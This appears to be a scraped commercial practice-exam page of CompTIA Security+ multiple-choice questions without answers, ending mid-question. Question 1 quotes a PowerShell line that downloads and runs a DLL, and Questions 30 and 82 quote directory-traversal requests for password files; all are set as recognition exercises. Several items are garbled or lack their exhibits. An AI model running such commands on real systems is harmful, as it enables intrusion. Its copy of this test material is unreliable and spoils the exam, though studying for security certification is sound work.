New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70special

CompTIA SY0-601 CompTIA Security+ Exam 2023 Exam Practice Test

Page: 1 / 106
Total 1063 questions

CompTIA Security+ Exam 2023 Questions and Answers

Testing Engine

  • Product Type: Testing Engine
$37.5  $124.99

PDF Study Guide

  • Product Type: PDF Study Guide
$33  $109.99
Question 1

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Question 2

Which of the following would most likely include language prohibiting end users from accessing personal email from a company device?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

AUP

Question 3

A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work. Which of the following should be included in this design to satisfy these requirements? (Select TWO).

Options:

A.

DLP

B.

MAC filtering

C.

NAT

D.

VPN

E.

Content filler

F.

WAF

Question 4

A company is concerned about individuals driving a car into the building to gain access. Which of the following security controls would work BEST to prevent this from happening?

Options:

A.

Bollard

B.

Camera

C.

Alarms

D.

Signage

E.

Access control vestibule

Question 5

A network security manager wants to implement periodic events that will test the security team's preparedness for incidents in a controlled and scripted manner, Which of the following concepts describes this scenario?

Options:

A.

Red-team exercise

B.

Business continuity plan testing

C.

Tabletop exercise

D.

Functional exercise

Question 6

An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following are the best options to accomplish this objective? (Select two.)

Options:

A.

Load balancing

B.

Incremental backups

C.

UPS

D.

RAID

E.

Dual power supply

F.

VLAN

Question 7

Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?

Options:

A.

EF x asset value

B.

ALE / SLE

C.

MTBF x impact

D.

SLE x ARO

Question 8

A security team will be outsourcing several key functions to a third party and will require that:

• Several of the functions will carry an audit burden.

• Attestations will be performed several times a year.

• Reports will be generated on a monthly basis.

Which of the following BEST describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?

Options:

A.

MOU

B.

AUP

C.

SLA

D.

MSA

Question 9

A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources. Which of the following should the security team do? (Refer the answer from CompTIA SY0-601 Security+ documents or guide at comptia.org)

Options:

A.

Identify rogue access points.

B.

Check for channel overlaps.

C.

Create heat maps.

D.

Implement domain hijacking.

Question 10

Which of the following can be used to detect a hacker who is stealing company data over port 80?

Options:

A.

Web application scan

B.

Threat intelligence

C.

Log aggregation

D.

Packet capture

Question 11

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the following techniques is the attacker using?

Options:

A.

Watering-hole attack

B.

Pretexting

C.

Typosquatting

D.

Impersonation

Question 12

An organization wants to quickly assess how effectively the IT team hardened new laptops Which of the following would be the best solution to perform this assessment?

Options:

A.

Install a SIEM tool and properly configure it to read the OS configuration files.

B.

Load current baselines into the existing vulnerability scanner.

C.

Maintain a risk register with each security control marked as compliant or non-compliant.

D.

Manually review the secure configuration guide checklists.

Question 13

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Question 14

A manager for the development team is concerned about reports showing a common set of vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the team. Which of the following approaches would be most effective for the manager to use to

address this issue?

Options:

A.

Tune the accuracy of fuzz testing.

B.

Invest in secure coding training and application security guidelines.

C.

Increase the frequency of dynamic code scans 1o detect issues faster.

D.

Implement code signing to make code immutable.

Question 15

A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?

Options:

A.

Provisioning

B.

Staging

C.

Development

D.

Quality assurance

Question 16

Which ol the following is required in order (or an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Question 17

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the most likely cause of the issue?

Options:

A.

The vendor firmware lacks support.

B.

Zero-day vulnerabilities are being discovered.

C.

Third-party applications are not being patched.

D.

Code development is being outsourced.

Question 18

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

Options:

A.

CYOD

B.

MDM

C.

COPE

D.

VDI

Question 19

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets

available?

Options:

A.

Adding a new UPS dedicated to the rack

B.

Installing a managed PDU

C.

Using only a dual power supplies unit

D.

Increasing power generator capacity

Question 20

A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user MOST likely experiencing?

Options:

A.

Bluejacking

B.

Jamming

C.

Rogue access point

D.

Evil twin

Question 21

A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network. Which of the following should the

company implement?

Options:

A.

PEAP

B.

PSK

C.

WPA3

D.

WPS

Question 22

Which of the following is a security implication of newer 1CS devices that are becoming more common in corporations?

Options:

A.

Devices with celular communication capabilities bypass traditional network security controls

B.

Many devices do not support elliptic-curve encryption algorithms due to the overhead they require.

C.

These devices often lade privacy controls and do not meet newer compliance regulations

D.

Unauthorized voice and audio recording can cause loss of intellectual property

Question 23

A penetration tester was able to compromise a host using previously captured network traffic. Which of the following is the result of this action?

Options:

A.

Integer overflow

B.

Race condition

C.

Memory leak

D.

Replay attack

Question 24

A security administrator recently used an internal CA to issue a certificate to a public application. A user tries to reach the application but receives a message stating, “Your connection is not private." Which of the following is the best way to fix this issue?

Options:

A.

Ignore the warning and continue to use the application normally.

B.

Install the certificate on each endpoint that needs to use the application.

C.

Send the new certificate to the users to install on their browsers.

D.

Send a CSR to a known CA and install the signed certificate on the application's server.

Question 25

A systems analyst is responsible for generating a new digital forensics chain -of- custody form Which of the following should the analyst include in this documentation? (Select two).

Options:

A.

The order of volatility

B.

A forensics NDA

C.

The provenance of the artifacts

D.

The vendor's name

E.

The date and time

F.

A warning banner

Question 26

A security analyst received the following requirements for the deployment of a security camera solution:

* The cameras must be viewable by the on-site security guards.

+ The cameras must be able to communicate with the video storage server.

* The cameras must have the time synchronized automatically.

* The cameras must not be reachable directly via the internet.

* The servers for the cameras and video storage must be available for remote maintenance via the company VPN.

Which of the following should the security analyst recommend to securely meet the remote connectivity requirements?

Options:

A.

Creating firewall rules that prevent outgoing traffic from the subnet the servers and cameras reside on

B.

Deploying a jump server that is accessible via the internal network that can communicate with the servers

C.

Disabling all unused ports on the switch that the cameras are plugged into and enabling MAC filtering

D.

Implementing a WAF to allow traffic from the local NTP server to the camera server

Question 27

After installing a patch On a security appliance. an organization realized a massive data exfiltration occurred. Which Of the following describes the incident?

Options:

A.

Supply chain attack

B.

Ransomware attack

C.

Cryptographic attack

D.

Password attack

Question 28

A software developer used open-source libraries to streamline development. Which of the following is the greatest risk when using this approach?

Options:

A.

Unsecure root accounts

B.

Lack of vendor support

C.

Password complexity

D.

Default settings

Question 29

A company a "right to forgotten" request To legally comply, the company must remove data related to the requester from its systems. Which Of the following Company most likely complying with?

Options:

A.

NIST CSF

B.

GDPR

C.

PCI OSS

D.

ISO 27001

Question 30

A security analyst reviews web server logs and finds the following string

gallerys?file—. ./../../../../. . / . ./etc/passwd

Which of the following attacks was performed against the web server?

Options:

A.

Directory traversal

B.

CSRF

C.

Pass the hash

D.

SQL injection

Question 31

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).

Options:

A.

MAC filtering

B.

Zero trust segmentation

C.

Network access control

D.

Access control vestibules

E.

Guards

F.

Bollards.

Question 32

The findings in a consultant's report indicate the most critical risk to the security posture from an incident response perspective is a lack of workstation and server investigation capabilities. Which of the following should be implemented to remediate this risk?

Options:

A.

HIDS

B.

FDE

C.

NGFW

D.

EDR

Question 33

Which of the following can reduce vulnerabilities by avoiding code reuse?

Options:

A.

Memory management

B.

Stored procedures

C.

Normalization

D.

Code obfuscation

Question 34

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the companVs mobile

application. After reviewing the back-end server logs, the security analyst finds the following entries

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

user-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Question 35

Which of the following best describes when an organization Utilizes a read-to-use application from a cloud provider?

Options:

A.

IaaS

B.

SaaS

C.

PaaS

D.

XaaS

Question 36

A financial institution recently joined a bug bounty program to identify security issues in the institution's new public platform. Which of the following best describes who the institution is working with to identify security issues?

Options:

A.

Script kiddie

B.

Insider threats

C.

Malicious actor

D.

Authorized hacker

Question 37

A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

Options:

A.

pcap reassembly

B.

SSD snapshot

C.

Image volatile memory

D.

Extract from checksums

Question 38

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

Options:

A.

nmap

B.

tracert

C.

ping

D.

ssh

Question 39

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Question 40

Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

Options:

A.

Vulnerability scanner

B.

Open-source intelligence

C.

Packet capture

D.

Threat feeds

Question 41

A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.

Perform the following steps:

1. Configure the RADIUS server.

2. Configure the WiFi controller.

3. Preconfigure the client for an

incoming guest. The guest AD

credentials are:

User: guest01

Password: guestpass

Options:

Question 42

A contractor overhears a customer recite their credit card number during a confidential phone call. The credit card Information is later used for a fraudulent transaction. Which of the following social engineering techniques describes this scenario?

Options:

A.

Shoulder surfing

B.

Watering hole

C.

Vishing

D.

Tailgating

Question 43

A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows. Which of the following is MOST likely the cause of the malware infection?

Options:

A.

Open permissions

B.

Improper or weak patch management

C.

Unsecure root accounts

D.

Default settings

Question 44

Which of the following models offers third-party-hosted, on-demand computing resources that can be shared with multiple organizations over the internet?

Options:

A.

Public cloud

B.

Hybrid cloud

C.

Community cloud

D.

Private cloud

Question 45

A systems engineer thinks a business system has been compromised and is being used to exfiltrated data to a competitor The engineer contacts the CSIRT The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else Which of the following is the most likely reason for this request?

Options:

A.

The CSIRT thinks an insider threat is attacking the network

B.

Outages of business-critical systems cost too much money

C.

The CSIRT does not consider the systems engineer to be trustworthy

D.

Memory contents including fileles malware are lost when the power is turned off

Question 46

A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites, whether the employee is in the offer or away. Which of the following solutions should the CISO implement?

Options:

A.

VAF

B.

SWG

C.

VPN

D.

WDS

Question 47

A security team is conducting a security review of a hosted data provider. The management team has asked the hosted data provider to share proof that customer data is being appropriately protected.

Which of the following would provide the best proof that customer data is being protected?

Options:

A.

SOC2

B.

CSA

C.

CSF

D.

1SO 31000

Question 48

Which Of the following security controls can be used to prevent multiple from using a unique card swipe and being admitted to a entrance?

Options:

A.

Visitor logs

B.

Faraday cages

C.

Access control vestibules

D.

Motion detection sensors

Question 49

A company was recently breached Pan of the company's new cybersecurity strategy is to centralize? the togs horn all security devices Which of the following components forwards the logs to a central source?

Options:

A.

Log enrichment

B.

Log queue

C.

Log parser

D.

Log collector

Question 50

A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

Options:

A.

RAID

B.

UPS

C.

NIC teaming

D.

Load balancing

Question 51

The management team has requested that the security team implement 802.1X into the existing wireless network setup. The following requirements must be met:

• Minimal interruption to the end user

• Mutual certificate validation

Which of the following authentication protocols would meet these requirements?

Options:

A.

EAP-FAST

B.

PSK

C.

EAP-TTLS

D.

EAP-TLS

Question 52

A security analyst is reviewing computer logs because a host was compromised by malware After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

Options:

A.

Dump file

B.

System log

C.

Web application log

D.

Security too

Question 53

An employee used a corporate mobile device during a vacation Multiple contacts were modified in the device vacation Which of the following method did attacker to insert the contacts without having 'Physical access to device?

Options:

A.

Jamming

B.

BluJacking

C.

Disassoaatm

D.

Evil twin

Question 54

Which of the following best describes a tool used by an organization to identi-fy, log, and track any potential risks and corresponding risk information?

Options:

A.

Quantitative risk assessment

B.

Risk register

C.

Risk control assessment

D.

Risk matrix

Question 55

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation (or a few days. Which of the following attacks can the account lockout be attributed to?

Options:

A.

Backdoor

B.

Brute-force

C.

Rootkit

D.

Trojan

Question 56

While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method?

Options:

A.

Data loss prevention

B.

Blocking IP traffic at the firewall

C.

Containerization

D.

File integrity monitoring

Question 57

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be best to help the organization's executives determine their next course of action?

Options:

A.

An incident response plan

B.

A communication plan

C.

A disaster recovery plan

D.

A business continuity plan

Question 58

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment Which of the following solutions should the engineer implement? (Select two).

Options:

A.

CASB

B.

WAF

C.

Load balancer

D.

VPN

E.

TLS

F.

DAST

Question 59

An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox. Which of the following would be the best way for the security administrator to address this type of alert in the future?

Options:

A.

Utilize a SOAR playbook to remove the phishing message.

B.

Manually remove the phishing emails when alerts arrive.

C.

Delay all emails until the retroactive alerts are received.

D.

Ingest the alerts into a SIEM to correlate with delivered messages.

Question 60

Which of the following social engineering attacks best describes an email that is primarily intended to mislead recipients into forwarding the email to others?

Options:

A.

Hoaxing

B.

Pharming

C.

Watering-hole

D.

Phishing

Question 61

A junior human resources administrator was gathering data about employees to submit to a new company awards program The employee data included job title business phone number location first initial with last name and race Which of the following best describes this type of information?

Options:

A.

Sensitive

B.

Non-Pll

C.

Private

D.

Confidential

Question 62

An analyst is working on an investigation with multiple alerts for multiple hosts. The hosts are showing signs of being compromised by a fast-spreading worm. Which of the following should be the next step in order to stop the spread?

Options:

A.

Disconnect every host from the network.

B.

Run an AV scan on the entire

C.

Scan the hosts that show signs of

D.

Place all known-infected hosts on an isolated network

Question 63

A security administrator is using UDP port 514 to send a syslog through an unsecure network to the SIEM server. Which of the following is the best way for the administrator to improve the process?

Options:

A.

Change the protocol to TCP.

B.

Add LDAP authentication to the SIEM server.

C.

Use a VPN from the internal server to the SIEM and enable DLP.

D.

Add SSL/TLS encryption and use a TCP 6514 port to send logs.

Question 64

While troubleshooting a service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity requirements. Which of the following would be the BEST solution to securely prevent future issues?

Options:

A.

Using an administrator account to run the processes and disabling the account when it is not in use

B.

Implementing a shared account the team can use to run automated processes

C.

Configuring a service account to run the processes

D.

Removing the password complexity requirements for the user account

Question 65

An organization wants a third-party vendor to do a penetration test that targets a specific device. The organization has provided basic information about the device. Which of the following best describes this kind of penetration test?

Options:

A.

Partially known environment

B.

Unknown environment

C.

Integrated

D.

Known environment

Question 66

Which of the following describes how applications are built, configured, and deployed?

Options:

A.

Provisioning

B.

Continuous validation

C.

Compiler

D.

Normalization

Question 67

Which of the following is considered a preventive control?

Options:

A.

Configuration auditing

B.

Log correlation

C.

Incident alerts

D.

Segregation of duties

Question 68

Which of the following best describes why a process would require a two-person integrity security control?

Options:

A.

To increase the chance that the activity will be completed in half of the time the process would take only one user to

complete

B.

To permit two users from another department to observe the activity that is being performed by an authorized user

C.

To reduce the risk that the procedures are performed incorrectly or by an unauthorized user

D.

To allow one person to perform the activity while being recorded on the CCTV camera

Question 69

During an investigation, an incident response team attempts to understand the source of an incident. Which of the following incident response activities describes this process?

Options:

A.

Analysis

B.

Lessons learned

C.

Detection

D.

Containment

Question 70

A security team discovers a vulnerability that does not have a patch available. The team determines the vulnerability is critical. Which of the following should the security engineers do to address the vulnerability?

Options:

A.

Withhold information about the discovered vulnerability so attackers cannot exploit the company's systems.

B.

Announce the discovery on social media and apply compensating controls.

C.

Inform the vendor of this discovery in a secure manner and apply appropriate mitigations.

D.

Provide the discovered vulnerability to the local authorities

Question 71

An application server is published directly on the internet with a public IP address Which of the following should the administrator use to monitor the application traffic?

Options:

A.

WAF

B.

Content filter

C.

NAT

D.

Perimeter network

Question 72

Which of the following best explains why physical security controls are important in creating a secure environment?

Options:

A.

To prevent external actors from obtaining sensitive data for social engineering attacks

B.

To allow different networks to work together without compromising the confidentiality of data

C.

To ensure only authorized users have the ability to obtain direct access to systems or data

D.

To reduce an attacker's ability to perform low-level or easier attacks against a network

Question 73

Which of the following ensures an organization can continue to do business with minimal interruption in the event of a major disaster?

Options:

A.

Business recovery plan

B.

Incident response plan

C.

Communication plan

D.

Continuity of operations plan

Question 74

An organization would like to gain actionable intelligence about real attacker techniques used against its systems. Which of the following should the organization use to best achieve this objective?

Options:

A.

Antivirus

B.

Honeypot

C.

Firewall

D.

Sensor

Question 75

The Chief Information Security Officer (CISO) at a large company would like to gain an understanding of how the company’s security policies compare to the requirements imposed by external regulators. Which of the following should the CISO use?

Options:

A.

Penetration test

B.

Internal audit

C.

Attestation

D.

External examination

Question 76

Which of the following attributes would be the most appropriate to apply when implementing MFA?

Options:

A.

Validating the user's location

B.

Requiring the user to identify images based on content

C.

Having the user agree to terms of service

D.

Enforcing the inclusion of special characters in user passwords

Question 77

An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?

Options:

A.

Deploying a SASE solution to remote employees

B.

Building a load-balanced VPN solution with redundant internet

C.

Purchasing a low-cost SD-WAN solution for VPN traffic

D.

Using a cloud provider to create additional VPN concentrators

Question 78

A company would like to provide employees with computers that do not have access to the internet in order to prevent information from being leaked to online forum. Which of the following would be best for the systems administrator to implement?

Options:

A.

Air gap

B.

Jump server

C.

Logical segmentation

D.

Virtualization

Question 79

Which of the following assists in training employees on the importance of cybersecurity?

Options:

A.

Phishing campaigns

B.

Acceptable use policy

C.

Employee handbook

D.

Social media analysis

Question 80

An incident response team for a media streaming provider is investigating a data exfiltration event of licensed video content that was able to circumvent advanced monitoring analytics The team has identified the following:

1 The analytics use machine learning with classifiers to label network data transfers.

2. Transfers labeled as "authenticated media stream’’ are permitted to egress, all ethers are interrupted/dropped

3. The most recent attempt was erroneously labeled as an "authenticated media stream."

4. An earlier attempt from the same threat actor was unsuccessful and labeled as "unauthorized media transfer."

5. The PCAP from the most recent event looks identical with the exception of a few bytes that had been modified

Which of the following moil likely occurred?

Options:

A.

Susceptibilities in the classifier enabled counter-AI techniques.

B.

Data used to train the model before deployment had been tainted

C.

An implant in the hardware supply chain went undetected

D.

The threat actor established a middle position and redirected the transfer

Question 81

An employee clicked a link in an email from a payment website that asked the employee to update contact information. The employee entered the log-in information but received a "page not found" error message. Which of the following types of social engineering attacks occurred?

Options:

A.

Brand impersonation

B.

Pretexting

C.

Typosquatting

D.

Phishing

Question 82

An analyst examines the web server logs after a compromise and finds the following:

Which of the following most likely indicates a successful attack on server credentials?

Options:

A.

GET https://comptia.org/robots.txt HTTP/1.1 200

B.

GET https://comptia.org/../../../Windows/win.ini HTTP/1.1 404

C.

GET HTTP/1.1 200 https://comptia.org/../../../etc/passwd

D.

GET https://comptia.org/./.../../etc/hosts HTTP/1.1 404

Question 83

A company is concerned about weather events causing damage to the server room and downtime. Which of the following should the company consider?

Options:

A.

Clustering servers

B.

Geographic dispersion

C.

Load balancers

D.

Off-site backups

Question 84

After an audit, an administrator discovers all users have access to confidential data on a file server. Which of the following should the administrator use to restrict access to the data quickly?

Options:

A.

Group Policy

B.

Content filtering

C.

Data loss prevention

D.

Access control lists

Question 85

An organization with high security needs is concerned about unauthorized exfiltration of data via Wi-Fi from within a secure facility. Which of the following security controls should the company

implement?

Options:

A.

Air-gapped network

B.

Faraday cage

C.

Screened subnet

D.

802.1X certificates

Question 86

The marketing department set up its own project management software without telling the appropriate departments. Which of the following describes this scenario?

Options:

A.

Shadow IT

B.

Insider threat

C.

Data exfiltration

D.

Service disruption

Question 87

A system^ administrator performs a quick scan of an organization's domain controller and finds the following:

Which of the following vulnerabilities does this output represent?

Options:

A.

Unnecessary open ports

B.

Insecure protocols

C.

Misconfigured firewall

D.

Weak user permissions

Question 88

During a recent breach, employee credentials were compromised when a service desk employee issued an MFA bypass code to an attacker who called and posed as an employee. Which of the following should be used to prevent this type of incident in the future?

Options:

A.

Hardware token MFA

B.

Biometrics

C.

Identity proofing

D.

Least privilege

Question 89

A company is providing laptops to all employees and the Chief Information Security Officer is concerned about protecting information if devices are lost or stolen. Which of the following would help mitigate the threat of unauthorized access to unencrypted data?

Options:

A.

UEFI

B.

EDR

C.

HIDS

D.

TPM

Question 90

Which of the following is required for an organization to properly manage its restore process in the event of system failure?

Options:

A.

IRP

B.

DRP

C.

RPO

D.

SDLC

Question 91

Which of the following should a systems administrator set up to increase the resilience of an application by splitting the traffic between two identical sites?

Options:

A.

Load balancing

B.

Geographic disruption

C.

Failover

D.

Parallel processing

Question 92

Which of the following enables the use of an input field to run commands that can view or manipulate data?

Options:

A.

Cross-site scripting

B.

Side loading

C.

Buffer overflow

D.

SQL injection

Question 93

A user, who is waiting for a flight at an airport, logs in to the airline website using the public Wi-Fi, ignores a security warning, and purchases an upgraded seat. When the flight lands, the user finds unauthorized credit card charges. Which of the following attacks most likely occurred?

Options:

A.

Replay attack

B.

Memory leak

C.

Buffer overflow attack

D.

On-path attack

Question 94

An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC's memory to find other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the following describes this type of attack?

Options:

A.

Privilege escalation

B.

Buffer overflow

C.

SQL injection

D.

Pass-the-hash

Question 95

A server administrator is reporting performance issues when accessing all internal resources. Upon further investigation, the security team notices the following:

• A user’s endpoint has been compromised and is broadcasting its MAC as the default gateway's MAC throughout the LAN.

• Traffic to and from that endpoint is significantly greater than all other similar endpoints on the LAN.

• Network ports on the LAN are not properly configured.

• Wired traffic is not being encrypted properly.

Which of the following attacks is most likely occurring?

Options:

A.

DDoS

B.

MAC flooding

C.

ARP poisoning

D.

DHCP snooping

Question 96

A security analyst scans a company's public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?

Options:

A.

Changing the remote desktop port to a non-standard number

B.

Setting up a VPN and placing the jump server inside the firewall

C.

Using a proxy for web connections from the remote desktop server

D.

Connecting the remote server to the domain and increasing the password length

Question 97

Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow table attack?

Options:

A.

Digital signatures

B.

Salting

C.

Hashing

D.

Perfect forward secrecy

Question 98

Which of the following permits consistent, automated deployment rather than manual provisioning of data centers?

Options:

A.

Transit gateway

B.

Private cloud

C.

Containerization

D.

Infrastructure as code

Question 99

Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked. Which of the following changes would allow users to access the site?

Options:

A.

Creating a firewall rule to allow HTTPS traffic

B.

Configuring the IPS to allow shopping

C.

Tuning the DLP rule that detects credit card data

D.

Updating the categorization in the content filter

Question 100

Which of the following allows for the attribution of messages to individuals?

Options:

A.

Adaptive identity

B.

Non-repudiation

C.

Authentication

D.

Access logs

Question 101

Which of the following describes the maximum allowance of accepted risk?

Options:

A.

Risk indicator

B.

Risk level

C.

Risk score

D.

Risk threshold

Question 102

A security department wants to conduct an exercise that will make many experimental changes to the main virtual server. After the exercise is completed, the IT director would like to be able to roll back to the state prior to the exercise. Which of the following backup types will allow for the fastest rollback?

Options:

A.

Incremental

B.

Snapshot

C.

Full

D.

Differential

Question 103

A security administrator is configuring fileshares. The administrator removed the default permissions and added permissions for only users who will need to access the fileshares as part of their job duties. Which of the following best describes why the administrator performed these actions?

Options:

A.

Encryption standard compliance

B.

Data replication requirements

C.

Least privilege

D.

Access control monitoring

Question 104

A bank was recently provided a new version of an executable that was used to launch its core banking platform. During the upgrade process, a remote code execution exploit was publicly released that targeted the old version. Which of the following would best prevent a security incident?

Options:

A.

Blocking the vulnerable file's hash from execution

B.

Completing the upgrade process immediately on all devices

C.

Disabling all inbound access from untrusted networks

D.

Adding an IDS signature to detect bad traffic on the firewall

Question 105

Which of the following should a security operations center use to improve its incident response procedure?

Options:

A.

Playbooks

B.

Frameworks

C.

Baselines

D.

Benchmarks

Question 106

A company is utilizing an offshore team to help support the finance department. The company wants to keep the data secure by keeping it on a company device but does not want to provide equipment to the offshore team. Which of the following should the company implement to meet this requirement?

Options:

A.

VDI

B.

MDM

C.

VPN

D.

VPC

Question 107

Which of the following utilizes public and private keys to secure data?

Options:

A.

Password hash

B.

Block cipher

C.

Asymmetric encryption

D.

Steganography

Question 108

A company uses a SaaS vendor to host its customer database. The company would like to reduce the risk of customer data exposure if the systems are breached. Which of the following risks should the company focus on to achieve this objective?

Options:

A.

Weak encryption

B.

Outsourced code development

C.

Supply chain

D.

Open ports and services

Question 109

An organization is upgrading its wireless system and wants to require MFA in order for users to connect to Wi-Fi. New access points were installed and connected to the controller. Which of the following is the next piece of technology that will be required to enable MFA?

Options:

A.

RADIUS

B.

BWPA3

C.

PSK

D.

HSM

E.

CBC-MAC

Question 110

A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following strategies is the bank requiring?

Options:

A.

Encryption at rest

B.

Masking

C.

Data classification

D.

Permission restrictions

Question 111

A governance, risk, and compliance team created a report that notes the existence of a chlorine processing facility two miles from one of the company offices. Which of the following describes this type of documentation?

Options:

A.

Site risk assessment

B.

Environmental impact report

C.

Disaster recovery plan

D.

Physical risk register

Question 112

Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?

Options:

A.

Fines

B.

Audit findings

C.

Sanctions

D.

Reputation damage

Question 113

An organization wants to minimize the recovery time from backups in case of a disaster. Backups must be retained for one month, while minimizing the storage space used for backups. Which of the following is the best approach for a backup strategy?

Options:

A.

Full monthly, incremental daily, and differential weekly

B.

Full weekly and incremental daily

C.

Full weekly and differential daily

D.

Full daily

Question 114

Which of the following describes an executive team that is meeting in a board room and testing the company's incident response plan?

Options:

A.

Continuity of operations

B.

Capacity planning

C.

Tabletop exercise

D.

Parallel processing

Question 115

A company was notified that a breach occurred within its network. During the investigation the security team identified a sophisticated exploit that could not be identified or resolved using existing patching, vendor resources or remediation methods Which erf the following best describes this type of exploit?

Options:

A.

Data loss

B.

Zero-day

C.

Data exfiltration

D.

Supply chain

Question 116

Which of the following techniques would most likely be used as a part of an insider threat reduction strategy to uncover relevant indicators?

Options:

A.

Blocking known file sharing sites

B.

Requiring credit monitoring

C.

Implementing impossible travel alerts

D.

Performing security awareness training

Question 117

A local business When of the following best describes a legal hold?

Options:

A.

It occurs during litigabon and requires retention of both electronic and physical documents.

B It occurs during a risk assessment and requires retention of risk-related documents.

B.

It occurs during incident recovery and requires retention of electronic documents

C.

It occurs during a business impact analysis and requires retention of documents categorized as personally identifiable information

Question 118

A company has implemented a policy that requires two people to agree in order to push any changes from the test codebase repository into production. Which of the following best describes this control type?

Options:

A.

Detective

B.

Technical

C.

Physical

D.

Operational

Question 119

Which of the following is a common source of unintentional corporate credential leakage in cloud environments?

Options:

A.

Code repositories

B.

Dark web

C.

Threat feeds

D.

State actors

E.

Vulnerability databases

Question 120

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee's corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation. Which of the following logs should the analyst use as a data source?

Options:

A.

Application

B.

IPS/IDS

C.

Network

D.

Endpoint

Question 121

A security operations center would like to be able to test and observe the behavior of new software executables for malicious activity. Which of the following should the security operations center implement?

Options:

A.

Fuzzing

B.

OS hardening

C.

Sandboxing

D.

Trusted Platform Module

Question 122

A new company wants to avoid channel interference when building a WLAN. The company needs to know the radio frequency behavior, identify dead zones, and determine the best place for access points. Which of the following should be done first?

Options:

A.

Configure heat maps.

B.

Utilize captive portals.

C.

Conduct a site survey.

D.

Install Wi-Fi analyzers.

Question 123

A company hired a security manager from outside the organization to lead security operations. Which of the following actions should the security manager perform first in this new role?

Options:

A.

Establish a security baseline.

B.

Review security policies.

C.

Adopt security benchmarks.

D.

Perform a user ID revalidation.

Question 124

An organization hired a third party to test its internal server environment for any exploitable vulnerabilities and to gain privileged access. The tester compromised several servers, and the organization was unable to detect any of the compromises. Which of the following actions would be best for the company to take to address these findings?

Options:

A.

Implement a SIEM to correlate logs from multiple sources looking for alterable incidents.

B.

